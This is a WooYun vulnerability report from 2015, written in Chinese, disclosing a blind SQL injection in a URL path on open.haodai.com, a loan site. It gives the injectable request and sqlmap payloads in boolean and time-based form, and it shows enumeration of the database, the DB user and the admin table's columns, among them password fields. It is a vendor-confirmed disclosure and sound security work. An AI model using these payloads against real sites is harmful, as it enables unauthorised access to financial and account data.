缺陷编号:WooYun-2015-0128247
漏洞标题:P2P金融安全之好贷网某站存在SQL盲注各种admin
相关厂商:好贷网
漏洞作者:二维码
提交时间:2015-07-22 07:34
公开时间:2015-09-05 10:40
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
2015-07-22: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-05: 细节向公众公开
好在是布尔型盲注,跑的速度还行。表里各种adminamount
注入点:
1 2 3 4 5 6 7 8 9 |
GET /list/index/city/beijing*/xd_type/gouche/money/10/month/12.html HTTP/1.1<br> X-Requested-With: XMLHttpRequest<br> Referer: http://open.haodai.com:80/<br> Cookie: PHPSESSID=gc4u5iaklethl5v2c7ap443562; city=beijing; LANDING_PAGE=http%3A%2F%2Fopen.haodai.com%2F; desktop=0; REFERER=open.haodai.com; SOURCE_URL=http%3A%2F%2Fopen.haodai.com%2F<br> Host: open.haodai.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br> Accept: */* |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
back-end DBMS: MySQL 5.0.12<br> sqlmap resumed the following injection point(s) from stored session:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://open.haodai.com:80/list/index/city/beijing') AND 2827=2827 AND ('IkuO'='IkuO/xd_type/gouche/money/10/month/12.htmlType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: http://open.haodai.com:80/list/index/city/beijing') AND (SELECT * FROM (SELECT(SLEEP(5)))WiVp) AND ('uRUa'='uRUa/xd_type/gouche/money/10/month/12.html<br> ---<br> back-end DBMS: MySQL 5.0.12<br> available databases [2]:<br> [*] hd<br> [*] information_schema |
user:
1 |
back-end DBMS: MySQL 5.0.12<br>current user: '[email protected]%' |
admin表:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
back-end DBMS: MySQL 5.0.12<br> Database: hd<br> Table: admin<br> [24 columns]<br> +--------------+-----------------------+<br> | Column | Type |<br> +--------------+-----------------------+<br> | agent_num | char(12) |<br> | agent_passwd | varchar(16) |<br> | agent_phone | varchar(16) |<br> | auth | varchar(1024) |<br> | citys | text |<br> | citys_iued | text |<br> | email | varchar(255) |<br> | id | int(10) unsigned |<br> | isreadtj | tinyint(1) unsigned |<br> | iutypes | text |<br> | menuid | smallint(5) unsigned |<br> | name | varchar(32) |<br> | pwd | char(60) |<br> | pwd_key | varchar(32) |<br> | qq | char(11) |<br> | relation | int(10) unsigned |<br> | role | varchar(10) |<br> | stat | tinyint(3) unsigned |<br> | tel | char(11) |<br> | tquin | int(11) unsigned |<br> | type | tinyint(3) unsigned |<br> | weixin | char(32) |<br> | xdtypes | text |<br> | zone_id | mediumint(8) unsigned |<br> +--------------+-----------------------+ |
太晚了,具体的一些敏感信息就不跑了,毕竟是金融站。
这个你们更专业
危害等级:高
漏洞Rank:20
确认时间:2015-07-2210:38
多谢
暂无
怎么知道在那个地方呢?
怎么网贷注入的payload都差不多
原文连接
的情况下转载,若非则不得使用我方内容。